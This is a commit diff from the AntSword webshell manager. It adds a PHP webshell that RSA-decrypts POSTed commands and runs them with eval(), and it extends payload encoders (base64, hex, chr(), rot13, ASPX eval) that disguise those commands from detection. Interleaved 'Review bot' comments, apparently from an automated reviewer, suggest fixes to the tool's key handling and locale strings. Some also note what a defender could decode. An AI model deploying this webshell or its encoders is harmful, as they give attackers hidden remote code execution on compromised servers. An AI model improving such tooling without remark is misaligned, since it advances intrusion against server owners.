Unverified Commit 4985a39c authored by Virink's avatar Virink

更新 编码器Encoder,添加扩展参数,添加 RSA 模式,添加 PHP-RSA 示例

parent 7c6b04da
<?php
/**
* _ ____ _
* __ _ _ __ | |_/ ___|_ _____ _ __ __| |
* / _` | '_ \| __\___ \ \ /\ / / _ \| '__/ _` |
* | (_| | | | | |_ ___) \ V V / (_) | | | (_| |
* \__,_|_| |_|\__|____/ \_/\_/ \___/|_| \__,_|
* ———————————————————————————————————————————————
* AntSword PHP eval RSA Script
*
* 警告:
* 此脚本仅供合法的渗透测试以及爱好者参考学习
* 请勿用于非法用途,否则将追究其相关责任!
* ———————————————————————————————————————————————
* pwd=ant
*/
$cmd = @$_POST['ant'];
$publicKey = <<<EOF
-----BEGIN PUBLIC KEY-----
Input your Public Key
-----END PUBLIC KEY-----
EOF;
$cmds = explode("|", $cmd);
$publicKey = openssl_pkey_get_public($publicKey);
$cmd = '';
foreach ($cmds as $value) {
if (openssl_public_decrypt(base64_decode($value), $de, $publicKey)) {
$cmd .= $de;
}
}
eval($cmd);
?>
\ No newline at end of file
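Review bot: The header docblock documents only `pwd=ant` and does not say what the RSA step protects. Because the script calls `openssl_public_decrypt` with a key embedded in the file, each `|`-separated segment can be recovered by anyone who holds this file, so the scheme authenticates the sender rather than hiding the payload. A responder who recovers the script can decode captured request bodies with the same key. I would add a docblock line such as `* RSA here authenticates the sender only; payloads are readable with the embedded public key`. The same comment should state that segments which fail to decrypt are skipped silently before `eval($cmd)`.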
......@@ -7,7 +7,7 @@
// 密码:ant
'use strict';
module.exports = (pwd, data) => {
module.exports = (pwd, data, ext = null) => {
data[pwd] = data['_'].replace(/eval/ig, 'xxxx');
delete data['_'];
return data;
......
......@@ -6,7 +6,7 @@
'use strict';
module.exports = (pwd, data) => {
module.exports = (pwd, data, ext = null) => {
let randomID = `_0x${Math.random().toString(16).substr(2)}`;
data[randomID] = Buffer.from(data['_']).toString('base64');
data[pwd] = `eval(System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String(Request.Item["${randomID}"])),"unsafe");`;
......
......@@ -6,8 +6,7 @@
'use strict';
module.exports = (pwd, data) => {
module.exports = (pwd, data, ext = null) => {
let randomID = `_0x${Math.random().toString(16).substr(2)}`;
let hexencoder = "function HexAsciiConvert(hex:String) {var sb:System.Text.StringBuilder = new System.Text.StringBuilder();var i;for(i=0; i< hex.Length; i+=2){sb.Append(System.Convert.ToString(System.Convert.ToChar(Int32.Parse(hex.Substring(i,2), System.Globalization.NumberStyles.HexNumber))));}return sb.ToString();};";
data[randomID] = Buffer.from(data['_']).toString('hex');
......
......@@ -7,6 +7,8 @@
'use strict';
const iconv = require('iconv-lite');
const NodeRSA = require('node-rsa');
const fs = require('fs');
class Base {
......@@ -52,11 +54,22 @@ class Base {
}
}
// 解析自定义编码器
this.user_encoders.map((_)=>{
this.user_encoders.map((_) => {
this.parseEncoder(`${_}`);
});
}
/**
* 返回 RSA 对象
* @return {Object}
*/
rsaEncrypt() {
let key = new NodeRSA();
let priKey = fs.readFileSync(path.join(remote.process.env.AS_WORKDIR, `antData/key_rsa`));
key.importKey(priKey.toString(), 'private');
return key;
}
/**
* 返回参数列表
* @return {array} [arg1, arg2, arg3..]
......@@ -131,7 +144,7 @@ class Base {
for (let funcName in templateObj) {
this[templateName][funcName] = (
(args) => {
if (typeof(args) === 'object') {
if (typeof (args) === 'object') {
// 如果脚本函数需要参数,则进行解析
return (argv) => {
let data = {};
......@@ -152,7 +165,7 @@ class Base {
(func = formatter[tagArr[0]])
) {
// 如果包含有分割标签且该格式化函数存在,则调用该函数进行处理
retStr = func( argv[tagArr[1] || ''] );
retStr = func(argv[tagArr[1] || '']);
} else {
// 否则替换直接返回字符串
retStr = argv[tagStr] || '';
......@@ -185,7 +198,7 @@ class Base {
// https://github.com/AntSwordProject/antSword/issues/135#issuecomment-475842870
delete require.cache[require.resolve(`${enc}`)];
// QAQ!我也不知道为什么,如果直接require变量名,babel编译就会warning,so我只好加个`咯~
this['__encoder__'][enc.indexOf(`encoder/`) > -1 ? enc.split(`encoder/`)[1]:enc.split(`encoder\\`)[1]] = require(`${enc}`);
this['__encoder__'][enc.indexOf(`encoder/`) > -1 ? enc.split(`encoder/`)[1] : enc.split(`encoder\\`)[1]] = require(`${enc}`);
}
/**
......@@ -196,10 +209,14 @@ class Base {
* @return {Object} 最终生成数据// 将返回三个参数对象:tag_s,tag_e,data
*/
encodeComplete(tag_s, tag_e, data) {
let ext = {
rsa: this.rsaEncrypt()
}
// 编码器处理
let finalData = this.__encoder__[this.__opts__['encoder']](
this.__opts__['pwd'],
data
data,
ext
);
return {
'tag_s': tag_s,
......@@ -225,7 +242,7 @@ class Base {
// 请求完毕返回数据{text,buff}
.once(`request-${hash}`, (event, ret) => {
return res({
'encoding': ret['encoding']||"",
'encoding': ret['encoding'] || "",
'text': ret['text'],
'buff': ret['buff']
});
......
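Review bot: `encodeComplete` now calls `this.rsaEncrypt()` on every request, so the private key at `antData/key_rsa` is read with `fs.readFileSync` and handed to whichever encoder is selected, including user-defined ones loaded through `require`. If that file has not been generated yet, `readFileSync` throws and encoders that never use RSA stop working too. `rsaEncrypt()` also uses `path` and `remote`, neither of which is among the requires visible in the first hunk, so confirm they are in scope in this module. Building `ext` with a lazy getter, as sketched below, keeps the key away from encoders that do not ask for it. The return statement of `encodeComplete` continues past the end of its hunk.

```javascript
  encodeComplete(tag_s, tag_e, data) {
    const self = this;
    const ext = {
      // Read and parse the private key only when an encoder touches ext.rsa
      get rsa() {
        return self.rsaEncrypt();
      }
    };
    // … unchanged: encoder call with (pwd, data, ext) and the returned object …
```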
......@@ -6,7 +6,7 @@
'use strict';
module.exports = (pwd, data) => {
module.exports = (pwd, data, ext = null) => {
let ret = {};
for (let _ in data) {
if (_ === '_') { continue };
......
......@@ -4,7 +4,7 @@
'use strict';
module.exports = (pwd, data) => {
module.exports = (pwd, data, ext = null) => {
let ret = {};
for (let _ in data) {
if (_ === '_') { continue };
......
......@@ -5,7 +5,7 @@
'use strict';
module.exports = (pwd, data) => {
module.exports = (pwd, data, ext = null) => {
// 生成一个随机变量名
let randomID = `_0x${Math.random().toString(16).substr(2)}`;
data[randomID] = Buffer.from(data['_']).toString('base64');
......
......@@ -5,14 +5,14 @@
'use strict'
module.exports = (pwd, data) => {
module.exports = (pwd, data, ext = null) => {
// 编码函数
const encode = (php) => {
let ret = [];
let i = 0;
while(i < php.length) {
while (i < php.length) {
ret.push(php[i].charCodeAt());
i ++;
i++;
}
return `@eVAl(cHr(${ret.join(').ChR(')}));`;
}
......
......@@ -5,14 +5,14 @@
'use strict'
module.exports = (pwd, data) => {
module.exports = (pwd, data, ext = null) => {
// 编码函数
const encode = (php) => {
let ret = [];
let i = 0;
while(i < php.length) {
while (i < php.length) {
ret.push(php[i].charCodeAt().toString(16));
i ++;
i++;
}
return `@eVAl(cHr(0x${ret.join(').ChR(0x')}));`;
}
......
......@@ -6,15 +6,15 @@
'use strict';
module.exports = (pwd, data) => {
module.exports = (pwd, data, ext = null) => {
const encode = (s) => {
//use a Regular Expression to Replace only the characters that are a-z or A-Z
return s.replace(/[a-zA-Z]/g, function (c) {
//Get the character code of the current character and add 13 to it
//If it is larger than z's character code then subtract 26 to support wrap around.
return String.fromCharCode((c <= "Z" ? 90 : 122) >= (c = c.charCodeAt(0) + 13) ? c : c - 26);
//Get the character code of the current character and add 13 to it
//If it is larger than z's character code then subtract 26 to support wrap around.
return String.fromCharCode((c <= "Z" ? 90 : 122) >= (c = c.charCodeAt(0) + 13) ? c : c - 26);
});
}
}
// 生成一个随机变量名
let randomID = `_0x${Math.random().toString(16).substr(2)}`;
......
......@@ -235,7 +235,7 @@ Hot Keys:
title: 'FileManager',
delete: {
title: 'Delete',
confirm: (num) => antSword.noxss(`Are you sure to delete ${typeof(num) === 'number' ? num + ' files' : num} ?`),
confirm: (num) => antSword.noxss(`Are you sure to delete ${typeof (num) === 'number' ? num + ' files' : num} ?`),
success: (path) => `Delete file [${path}] success!`,
error: (path, err) => `Delete file [${path}] failed!${err ? '\n' + err : ''}`
},
......@@ -522,7 +522,7 @@ Hot Keys:
gridheader: "Name,Type,Length,Not Null,Key,Auto Increment",
delete_not_select: "Please select the row you want to delete first",
save_row_is_null: "The number of rows is empty",
cell_valid_error: (i,j)=>`Data format validation failed(row ${i+1}, col ${j+1})`,
cell_valid_error: (i, j) => `Data format validation failed(row ${i + 1}, col ${j + 1})`,
confirmtitle: "New table name",
invalid_tablename: "Table names should not contain special symbols",
success: 'Create table successfully',
......@@ -535,7 +535,7 @@ Hot Keys:
error: 'Failed to update table',
},
deltable: {
title:'Delete Table',
title: 'Delete Table',
confirm: (name) => antSword.noxss(`Are you sure you want to delete table ${name}?`),
success: 'Delete table successfully',
error: 'Failed to delete table',
......@@ -551,7 +551,7 @@ Hot Keys:
error: 'Failed to update column',
},
delcolumn: {
title:'Delete Column',
title: 'Delete Column',
confirm: (name) => antSword.noxss(`Are you sure you want to delete column ${name}?`),
success: 'Delete column successfully',
error: 'Failed to delete column',
......@@ -615,10 +615,10 @@ Hot Keys:
}
},
message: {
githint: (workdir)=>`The current source is Git management, please close the program and go to ${workdir} to manually update`,
githint: (workdir) => `The current source is Git management, please close the program and go to ${workdir} to manually update`,
prepare: "Connecte to server...",
dling: (progress)=> `Downloading...${progress}%`,
dlingnp: (size)=> `Downloading...${size}`,
dling: (progress) => `Downloading...${progress}%`,
dlingnp: (size) => `Downloading...${size}`,
dlend: "Download completed",
extract: "Unpacking, don't close AntSword",
ing: 'Downloading..',
......@@ -626,7 +626,7 @@ Hot Keys:
success: 'Update success! Please manually restart the application later!'
}
},
encoders:{
encoders: {
title: 'Encoder Manager',
toolbar: {
new: "New",
......@@ -634,11 +634,19 @@ Hot Keys:
delete: "Delete",
help: "Help",
save: "Save",
rsa: "RSA Config",
generate: "Generate"
},
grid: {
ename: "Name",
etype: "Type"
},
form: {
public_key: "Public Key",
private_key: "Private Key",
php_code: "PHP Code"
},
rsa_config_win_title: "RSA Encoder Config",
edit_win_title: "Edit Encoder",
delete_title: "Delete Encoder",
message: {
......@@ -654,12 +662,15 @@ Hot Keys:
delete_not_select: "Please select the row you want to delete first",
delete_success: "Delete success",
ename_invalid: "Name can only contain numbers, letters, and underlines",
rsa_save_success: "Generate and save RSA success",
rsa_save_error: "Generate and save RSA error",
},
prompt: {
create_encoder: "Create Encoder",
},
confirm: {
delete: (num) => antSword.noxss(`Are you sure to delete ${typeof(num) === 'number' ? num + ' encoders' : num}?`),
generate: 'Are you sure to regemerate RSA?',
delete: (num) => antSword.noxss(`Are you sure to delete ${typeof (num) === 'number' ? num + ' encoders' : num}?`),
}
},
aproxy: {
......@@ -670,7 +681,7 @@ Hot Keys:
},
form: {
label: 'Configure proxy for access to the Internet',
mode:{
mode: {
noproxy: 'Do not use agent',
manualproxy: 'Manually set the proxy'
},
......@@ -689,7 +700,7 @@ Hot Keys:
content: 'Restart the application to take effect, whether to restart?',
title: 'Change proxy settings'
},
prompt:{
prompt: {
title: 'Enter the Test-URL',
success: 'Connect to proxy server successfully',
error: 'Failed to connect to the proxy server'
......@@ -706,7 +717,7 @@ Hot Keys:
toolbar: {
save: 'Save'
},
form:{
form: {
shellmanager: {
title: 'Shell Lists',
hiddencolumns: {
......@@ -759,7 +770,7 @@ Hot Keys:
},
del: {
title: 'Delete Bookmark',
confirm: (num) => antSword.noxss(`Are you sure to delete ${typeof(num) === 'number' ? num + ' Bookmarks' : num+" "}?`),
confirm: (num) => antSword.noxss(`Are you sure to delete ${typeof (num) === 'number' ? num + ' Bookmarks' : num + " "}?`),
success: 'Delete success'
},
edit: {
......@@ -781,7 +792,7 @@ Hot Keys:
},
viewsite: {
toolbar: {
useproxy: (s) => `Proxy: ${s?'ON':'OFF'}`,
useproxy: (s) => `Proxy: ${s ? 'ON' : 'OFF'}`,
save: 'Save',
view: 'View'
},
......
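Review bot: The added confirmation string `generate: 'Are you sure to regemerate RSA?'` misspells "regenerate". Suggested wording: `generate: 'Are you sure you want to regenerate the RSA key pair?',`.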
......@@ -236,7 +236,7 @@ module.exports = {
title: '文件管理',
delete: {
title: '删除文件',
confirm: (num) => antSword.noxss(`你确定要删除 ${typeof(num) === 'number' ? num + ' 个文件' : num} 吗?`),
confirm: (num) => antSword.noxss(`你确定要删除 ${typeof (num) === 'number' ? num + ' 个文件' : num} 吗?`),
success: (path) => `删除文件成功!\n${path}`,
error: (path, err) => `删除文件 [${path}] 失败!${err ? '\n' + err : ''}`
},
......@@ -523,7 +523,7 @@ module.exports = {
gridheader: "名称,类型,长度,不为空,主键,自增长",
delete_not_select: "请先选中要删除的行",
save_row_is_null: "行数为空",
cell_valid_error: (i,j)=>`数据格式校验失败(${i+1}行,${j+1}列)`,
cell_valid_error: (i, j) => `数据格式校验失败(${i + 1}行,${j + 1}列)`,
confirmtitle: "输入新表名",
invalid_tablename: "表名不能带有特殊符号",
success: '新建表成功',
......@@ -536,7 +536,7 @@ module.exports = {
error: '修改表名失败',
},
deltable: {
title:'删除表',
title: '删除表',
confirm: (name) => antSword.noxss(`确定要删除表 ${name} 吗?`),
success: '删除表成功',
error: '删除表失败',
......@@ -552,7 +552,7 @@ module.exports = {
error: '修改列名失败'
},
delcolumn: {
title:'删除列',
title: '删除列',
confirm: (name) => antSword.noxss(`确定要删除列 ${name} 吗?`),
success: '删除列成功',
error: '删除列失败',
......@@ -616,10 +616,10 @@ module.exports = {
}
},
message: {
githint: (workdir)=>`当前源码为Git管理,请关闭程序并前往 ${workdir} 手动更新`,
githint: (workdir) => `当前源码为Git管理,请关闭程序并前往 ${workdir} 手动更新`,
prepare: "连接更新服务器...",
dling: (progress)=> `正在下载更新包...${progress}%`,
dlingnp: (size)=> `正在下载更新包...${size}`,
dling: (progress) => `正在下载更新包...${progress}%`,
dlingnp: (size) => `正在下载更新包...${size}`,
dlend: "下载完毕",
extract: "正在解压, 请勿关闭程序",
ing: '努力更新中。。',
......@@ -627,7 +627,7 @@ module.exports = {
success: '更新成功!请稍后手动重启应用!'
}
},
encoders:{
encoders: {
title: '编码管理',
toolbar: {
new: "新建",
......@@ -635,11 +635,19 @@ module.exports = {
delete: "删除",
help: "帮助",
save: "保存",
rsa: "RSA配置",
generate: "生成"
},
grid: {
ename: "名称",
etype: "类型"
},
form: {
public_key: "公钥",
private_key: "私钥",
php_code: "PHP 代码"
},
rsa_config_win_title: "RSA编码器配置",
edit_win_title: "编辑编码器",
delete_title: "删除编码器",
message: {
......@@ -655,12 +663,15 @@ module.exports = {
delete_not_select: "请先选中要删除的行",
delete_success: "删除成功",
ename_invalid: "名称只能包含数字、字母、下划线",
rsa_save_success: "生成 RSA 密钥对成功",
rsa_save_error: "生成 RSA 密钥对错误",
},
prompt: {
create_encoder: "创建编码器",
},
confirm: {
delete: (num) => antSword.noxss(`你确定要删除 ${typeof(num) === 'number' ? num + ' 个编码器' : num+" "}吗?`),
generate: '你确定要重新生成?',
delete: (num) => antSword.noxss(`你确定要删除 ${typeof (num) === 'number' ? num + ' 个编码器' : num + " "}吗?`),
}
},
aproxy: {
......@@ -671,7 +682,7 @@ module.exports = {
},
form: {
label: '配置访问互联网的代理',
mode:{
mode: {
noproxy: '不使用代理',
manualproxy: '手动设置代理'
},
......@@ -690,7 +701,7 @@ module.exports = {
content: '重启应用生效,是否重启?',
title: '更改代理设置'
},
prompt:{
prompt: {
title: '输入测试的 URL',
success: '连接到代理服务器成功',
error: '连接到代理服务器失败'
......@@ -707,7 +718,7 @@ module.exports = {
toolbar: {
save: '保存'
},
form:{
form: {
shellmanager: {
title: '数据管理',
hiddencolumns: {
......@@ -760,7 +771,7 @@ module.exports = {
},
del: {
title: '删除书签',
confirm: (num) => antSword.noxss(`你确定要删除 ${typeof(num) === 'number' ? num + ' 个书签' : num+" "}吗?`),
confirm: (num) => antSword.noxss(`你确定要删除 ${typeof (num) === 'number' ? num + ' 个书签' : num + " "}吗?`),
success: '删除成功'
},
edit: {
......@@ -781,7 +792,7 @@ module.exports = {
},
viewsite: {
toolbar: {
useproxy: (s) => `代理: ${s?'开':'关'}`,
useproxy: (s) => `代理: ${s ? '开' : '关'}`,
save: '保存',
view: '浏览'
},
......
......@@ -236,7 +236,7 @@ module.exports = {
title: '文件管理',
delete: {
title: '刪除文件',
confirm: (num) => antSword.noxss(`你確定要刪除 ${typeof(num) === 'number' ? num + ' 個文件' : num} 嗎?`),
confirm: (num) => antSword.noxss(`你確定要刪除 ${typeof (num) === 'number' ? num + ' 個文件' : num} 嗎?`),
success: (path) => `刪除文件成功!\n${path}`,
error: (path, err) => `刪除文件 [${path}] 失敗!${err ? '\n' + err : ''}`
},
......@@ -523,7 +523,7 @@ module.exports = {
gridheader: "名稱,類型,長度,不為空,主鍵,自增長",
delete_not_select: "請先選中要刪除的行",
save_row_is_null: "行數為空",
cell_valid_error: (i,j)=>`數據格式校驗失敗(${i+1}行,${j+1}列)`,
cell_valid_error: (i, j) => `數據格式校驗失敗(${i + 1}行,${j + 1}列)`,
confirmtitle: "輸入新表名",
invalid_tablename: "表名不能帶有特殊符號",
success: '新建表成功',
......@@ -536,7 +536,7 @@ module.exports = {
error: '修改表名失敗',
},
deltable: {
title:'刪除表',
title: '刪除表',
confirm: (name) => antSword.noxss(`確定要刪除表 ${name} 嗎?`),
success: '刪除表成功',
error: '刪除表失敗',
......@@ -552,7 +552,7 @@ module.exports = {
error: '修改列名失敗'
},
delcolumn: {
title:'刪除列',
title: '刪除列',
confirm: (name) => antSword.noxss(`確定要刪除列 ${name} 嗎?`),
success: '刪除列成功',
error: '刪除列失敗',
......@@ -616,10 +616,10 @@ module.exports = {
}
},
message: {
githint: (workdir)=>`當前源碼為Git管理,請關閉程序並前往 ${workdir} 手動更新`,
githint: (workdir) => `當前源碼為Git管理,請關閉程序並前往 ${workdir} 手動更新`,
prepare: "連接更新服務器...",
dling: (progress)=> `正在下載更新包...${progress}%`,
dlingnp: (size)=> `正在下載更新包...${size}`,
dling: (progress) => `正在下載更新包...${progress}%`,
dlingnp: (size) => `正在下載更新包...${size}`,
dlend: "下載完畢",
extract: "正在解壓, 請勿關閉程序",
ing: '努力更新中。。',
......@@ -627,7 +627,7 @@ module.exports = {
success: '更新成功!請稍後手動重啟應用!'
}
},
encoders:{
encoders: {
title: '編碼管理',
toolbar: {
new: "新建",
......@@ -635,11 +635,19 @@ module.exports = {
delete: "刪除",
help: "幫助",
save: "保存",
rsa: "RSA配置",
generate: "生成"
},
grid: {
ename: "名稱",
etype: "類型"
},
form: {
public_key: "公鑰",
private_key: "私鑰",
php_code: "PHP 代碼"
},
rsa_config_win_title: "RSA編碼器配置",
edit_win_title: "編輯編碼器",
delete_title: "刪除編碼器",
message: {
......@@ -655,12 +663,15 @@ module.exports = {
delete_not_select: "請先選中要刪除的行",
delete_success: "刪除成功",
ename_invalid: "名稱只能包含數字、字母、下劃線",
rsa_save_success: "生成 RSA 密鑰對成功",
rsa_save_error: "生成 RSA 密鑰對錯誤",
},
prompt: {
generate: '妳確定要重新生成?',
create_encoder: "創建編碼器",
},
confirm: {
delete: (num) => antSword.noxss(`你確定要刪除 ${typeof(num) === 'number' ? num + ' 個編碼器' : num+" "}嗎?`),
delete: (num) => antSword.noxss(`你確定要刪除 ${typeof (num) === 'number' ? num + ' 個編碼器' : num + " "}嗎?`),
}
},
aproxy: {
......@@ -671,7 +682,7 @@ module.exports = {
},
form: {
label: '配置訪問互聯網的代理',
mode:{
mode: {
noproxy: '不使用代理',
manualproxy: '手動設置代理'
},
......@@ -690,7 +701,7 @@ module.exports = {
content: '重啟應用生效,是否重啟?',
title: '更改代理設置'
},
prompt:{
prompt: {
title: '輸入測試的 URL',
success: '連接到代理服務器成功',
error: '連接到代理服務器失敗'
......@@ -707,7 +718,7 @@ module.exports = {
toolbar: {
save: '保存'
},
form:{
form: {
shellmanager: {
title: '數據管理',
hiddencolumns: {
......@@ -760,7 +771,7 @@ module.exports = {
},
del: {
title: '刪除書籤',
confirm: (num) => antSword.noxss(`你確定要刪除 ${typeof(num) === 'number' ? num + ' 個書籤' : num+" "}嗎?`),
confirm: (num) => antSword.noxss(`你確定要刪除 ${typeof (num) === 'number' ? num + ' 個書籤' : num + " "}嗎?`),
success: '刪除成功'
},
edit: {
......@@ -781,7 +792,7 @@ module.exports = {
},
viewsite: {
toolbar: {
useproxy: (s) => `代理: ${s?'開':'關'}`,
useproxy: (s) => `代理: ${s ? '開' : '關'}`,
save: '保存',
view: '瀏覽'
},
......
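Review bot: The new `generate` string is added under `prompt` in this language file, while the other language files in this commit put it under `confirm`, and the RSA config dialog reads `LANG['confirm']['generate']`. With this locale the confirmation text and title would render as `undefined`. Move the line `generate: '妳確定要重新生成?',` into the `confirm` object next to `delete`.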
......@@ -236,7 +236,7 @@ module.exports = {
title: '文件管理',
delete: {
title: '刪除文件',
confirm: (num) => antSword.noxss(`你確定要刪除 ${typeof(num) === 'number' ? num + ' 個文件' : num} 嗎?`),
confirm: (num) => antSword.noxss(`你確定要刪除 ${typeof (num) === 'number' ? num + ' 個文件' : num} 嗎?`),
success: (path) => `刪除文件成功!\n${path}`,
error: (path, err) => `刪除文件 [${path}] 失敗!${err ? '\n' + err : ''}`
},
......@@ -523,7 +523,7 @@ module.exports = {
gridheader: "名稱,類型,長度,不為空,主鍵,自增長",
delete_not_select: "請先選中要刪除的行",
save_row_is_null: "行數為空",
cell_valid_error: (i,j)=>`數據格式校驗失敗(${i+1}行,${j+1}列)`,
cell_valid_error: (i, j) => `數據格式校驗失敗(${i + 1}行,${j + 1}列)`,
confirmtitle: "輸入新表名",
invalid_tablename: "表名不能帶有特殊符號",
success: '新建表成功',
......@@ -536,7 +536,7 @@ module.exports = {
error: '修改表名失敗',
},
deltable: {
title:'刪除表',
title: '刪除表',
confirm: (name) => antSword.noxss(`確定要刪除表 ${name} 嗎?`),
success: '刪除表成功',
error: '刪除表失敗',
......@@ -552,7 +552,7 @@ module.exports = {
error: '修改列名失敗'
},
delcolumn: {
title:'刪除列',
title: '刪除列',
confirm: (name) => antSword.noxss(`確定要刪除列 ${name} 嗎?`),
success: '刪除列成功',
error: '刪除列失敗',
......@@ -616,10 +616,10 @@ module.exports = {
}
},
message: {
githint: (workdir)=>`當前源碼為Git管理,請關閉程序並前往 ${workdir} 手動更新`,
githint: (workdir) => `當前源碼為Git管理,請關閉程序並前往 ${workdir} 手動更新`,
prepare: "連接更新服務器...",
dling: (progress)=> `正在下載更新包...${progress}%`,
dlingnp: (size)=> `正在下載更新包...${size}`,
dling: (progress) => `正在下載更新包...${progress}%`,
dlingnp: (size) => `正在下載更新包...${size}`,
dlend: "下載完畢",
extract: "正在解壓, 請勿關閉程序",
ing: '努力更新中。。',
......@@ -627,7 +627,7 @@ module.exports = {
success: '更新成功!請稍後手動重啟應用!'
}
},
encoders:{
encoders: {
title: '編碼管理',
toolbar: {
new: "新建",
......@@ -635,11 +635,19 @@ module.exports = {
delete: "刪除",
help: "幫助",
save: "保存",
rsa: "RSA配置",
generate: "生成"
},
grid: {
ename: "名稱",
etype: "類型"
},
form: {
public_key: "公鑰",
private_key: "私鑰",
php_code: "PHP 代碼"
},
rsa_config_win_title: "RSA編碼器配置",
edit_win_title: "編輯編碼器",
delete_title: "刪除編碼器",
message: {
......@@ -655,12 +663,15 @@ module.exports = {
delete_not_select: "請先選中要刪除的行",
delete_success: "刪除成功",
ename_invalid: "名稱只能包含數字、字母、下劃線",
rsa_save_success: "生成 RSA 密鑰對成功",
rsa_save_error: "生成 RSA 密鑰對錯誤",
},
prompt: {
create_encoder: "創建編碼器",
},
confirm: {
delete: (num) => antSword.noxss(`你確定要刪除 ${typeof(num) === 'number' ? num + ' 個編碼器' : num+" "}嗎?`),
generate: '妳確定要重新生成?',
delete: (num) => antSword.noxss(`你確定要刪除 ${typeof (num) === 'number' ? num + ' 個編碼器' : num + " "}嗎?`),
}
},
aproxy: {
......@@ -671,7 +682,7 @@ module.exports = {
},
form: {
label: '配置訪問互聯網的代理',
mode:{
mode: {
noproxy: '不使用代理',
manualproxy: '手動設置代理'
},
......@@ -690,7 +701,7 @@ module.exports = {
content: '重啟應用生效,是否重啟?',
title: '更改代理設置'
},
prompt:{
prompt: {
title: '輸入測試的 URL',
success: '連接到代理服務器成功',
error: '連接到代理服務器失敗'
......@@ -707,7 +718,7 @@ module.exports = {
toolbar: {
save: '保存'
},
form:{
form: {
shellmanager: {
title: '數據管理',
hiddencolumns: {
......@@ -760,7 +771,7 @@ module.exports = {
},
del: {
title: '刪除書籤',
confirm: (num) => antSword.noxss(`你確定要刪除 ${typeof(num) === 'number' ? num + ' 個書籤' : num+" "}嗎?`),
confirm: (num) => antSword.noxss(`你確定要刪除 ${typeof (num) === 'number' ? num + ' 個書籤' : num + " "}嗎?`),
success: '刪除成功'
},
edit: {
......@@ -781,7 +792,7 @@ module.exports = {
},
viewsite: {
toolbar: {
useproxy: (s) => `代理: ${s?'開':'關'}`,
useproxy: (s) => `代理: ${s ? '開' : '關'}`,
save: '保存',
view: '瀏覽'
},
......
......@@ -10,6 +10,7 @@ const LANG = antSword['language']['settings']['encoders'];
const LANG_T = antSword['language']['toastr'];
const fs = require('fs');
const path = require('path');
const NodeRSA = require('node-rsa');
const WIN = require("../../ui/window");
class Encoders {
......@@ -18,6 +19,14 @@ class Encoders {
var that = this;
this.encoders = antSword["encoders"];
let keyPath = path.join(remote.process.env.AS_WORKDIR, `antData/`);
this.rsa = {
keyPath: {
pub: `${keyPath}/key_rsa.pub`,
pri: `${keyPath}/key_rsa`
}
}
sidebar.addItem({
id: 'encoders',
text: `<i class="fa fa-file-code-o"></i> ${LANG['title']}`
......@@ -27,39 +36,49 @@ class Encoders {
const toolbar = that.cell.attachToolbar();
toolbar.loadStruct([
{ type: 'buttonSelect', text: LANG['toolbar']['new'], icon: 'plus-circle', id: 'new', openAll: true,
options: [
{ id: 'new_asp', icon: 'file-code-o', type: 'button', text: "ASP" },
{ id: 'new_aspx', icon: 'file-code-o', type: 'button', text: "ASPX"},
{ id: 'new_php', icon: 'file-code-o', type: 'button', text: "PHP"},
{ type: 'separator' },
{ id: 'new_custom', icon: 'file-code-o', type: 'button', text: "Custom"}
]},
{
type: 'buttonSelect', text: LANG['toolbar']['new'], icon: 'plus-circle', id: 'new', openAll: true,
options: [
{ id: 'new_asp', icon: 'file-code-o', type: 'button', text: "ASP" },
{ id: 'new_aspx', icon: 'file-code-o', type: 'button', text: "ASPX" },
{ id: 'new_php', icon: 'file-code-o', type: 'button', text: "PHP" },
{ type: 'separator' },
{ id: 'new_custom', icon: 'file-code-o', type: 'button', text: "Custom" },
{ type: 'separator' },
{ id: 'new_php_rsa', icon: 'file-code-o', type: 'button', text: "PHP RSA" }
]
},
{ type: 'separator' },
{ type: 'button', text: LANG['toolbar']['edit'], icon: 'fa fa-edit', id: 'edit' },
{ type: 'button', text: LANG['toolbar']['delete'], icon: 'fa fa-trash-o', id: 'delete' },
{ type: 'separator' },
{ type: 'button', text: LANG['toolbar']['rsa'], icon: 'fa fa-key', id: 'rsa' }
]);
toolbar.attachEvent("onClick", (id)=>{
switch(id) {
toolbar.attachEvent("onClick", (id) => {
switch (id) {
case "new_asp":
that.createEncoder("asp");
break;
that.createEncoder(id);
break;
case "new_aspx":
that.createEncoder("aspx");
break;
that.createEncoder(id);
break;
case "new_php":
that.createEncoder("php");
break;
case "new_php_rsa":
that.createEncoder(id);
break;
case "new_custom":
that.createEncoder("custom");
break;
that.createEncoder(id);
break;
case "edit":
that.editEncoder();
break;
that.editEncoder();
break;
case "delete":
that.deleteEncoder();
break;
that.deleteEncoder();
break;
case "rsa":
that.rsaConfig();
break;
}
});
......@@ -75,87 +94,90 @@ class Encoders {
grid.setColAlign("center,left,center");
grid.enableMultiselect(true);
var combobox = grid.getCombo(2);
combobox.put("asp","ASP");
combobox.put("aspx","ASPX");
combobox.put("php","PHP");
combobox.put("custom","CUSTOM");
grid.attachEvent("onEditCell", function(stage,rId,cInd,nValue,oValue){
combobox.put("asp", "ASP");
combobox.put("aspx", "ASPX");
combobox.put("php", "PHP");
combobox.put("custom", "CUSTOM");
grid.attachEvent("onEditCell", function (stage, rId, cInd, nValue, oValue) {
// 2 编辑完成
if(stage === 2) {
if (stage === 2) {
nValue = nValue.toLocaleLowerCase();
oValue = oValue.toLocaleLowerCase();
if(nValue === oValue){return;}
if (nValue === oValue) { return; }
var oename = grid.getRowAttribute(rId, "ename");
var oepath = grid.getRowAttribute(rId, "epath");
var oetype = grid.getRowAttribute(rId, "etype");
oepath = oepath+".js";
switch(cInd){
oepath = oepath + ".js";
switch (cInd) {
case 1:
// name
if(!nValue.match(/^[a-zA-Z0-9_]+$/)){
toastr.error(LANG["message"]["ename_invalid"],LANG_T['error']);
return
}
if(that._checkname(nValue, oetype)){
toastr.error(LANG['message']['ename_duplicate'], LANG_T['error']);
return;
}
fs.renameSync(oepath, path.join(remote.process.env.AS_WORKDIR, `antData/encoders/${oetype}/encoder/${nValue}.js`));
toastr.success(LANG['message']["rename_success"],LANG_T["success"]);
break
// name
if (!nValue.match(/^[a-zA-Z0-9_]+$/)) {
toastr.error(LANG["message"]["ename_invalid"], LANG_T['error']);
return
}
if (that._checkname(nValue, oetype)) {
toastr.error(LANG['message']['ename_duplicate'], LANG_T['error']);
return;
}
fs.renameSync(oepath, path.join(remote.process.env.AS_WORKDIR, `antData/encoders/${oetype}/encoder/${nValue}.js`));
toastr.success(LANG['message']["rename_success"], LANG_T["success"]);
break
case 2:
// type
if(nValue != "asp" && nValue != "aspx" && nValue != "php" && nValue != "custom") {
toastr.error(LANG['message']["etype_error"], LANG_T['error']);
return
}
if(that._checkname(oename, nValue)){
